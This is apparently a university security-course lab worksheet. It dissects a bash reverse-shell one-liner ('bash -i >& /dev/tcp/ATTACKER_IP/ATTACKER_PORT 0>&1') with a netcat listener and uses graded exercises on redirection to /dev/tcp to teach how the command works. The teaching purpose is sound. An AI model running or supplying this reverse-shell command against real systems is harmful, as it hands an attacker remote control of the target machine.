LAB: That crazy bash command

In the reverse shell assignment, I asked you to set up a listener on your attacking machine (nc -l -p 5000 or something like that) and then cause the target machine to reach out to the attacker with a shell by executing a command like this:

bash -c "bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1"

We're going to go through this lab together in class to try to gradually make sense of the pieces of this command.

To get started:

on your host OS, open a terminal
on Kali:
- cd to a convenient working directory on Kali
- create a python program named hello.py containing the following:
  
  import sys print('hello from stdout') print('hello from stderr', file=sys.stderr)

Your Carleton user name, lower case:

What happens when you execute echo $0?

What happens when you execute python3 hello.py?

What happens when you execute python3 hello.py > test1.txt?

What happens when you execute python3 hello.py 2> test2.txt?

What happens when you execute python3 hello.py >& test3.txt? How about python3 hello.py &> test4.txt? (The distinction appears to be one of personal preference.)

What happens when you execute python3 hello.py 2> /dev/null?

On your host OS, launch a listener at port 5000 (or whatever). What happens when you go back to Kali and execute python3 hello.py 2> /dev/tcp/HOST_IP/5000?

Execute bash on Kali, and then echo $0.

Still using bash, what happens when you execute python3 hello.py 2> /dev/tcp/HOST_IP/5000? Try the other redirections too (>, >&)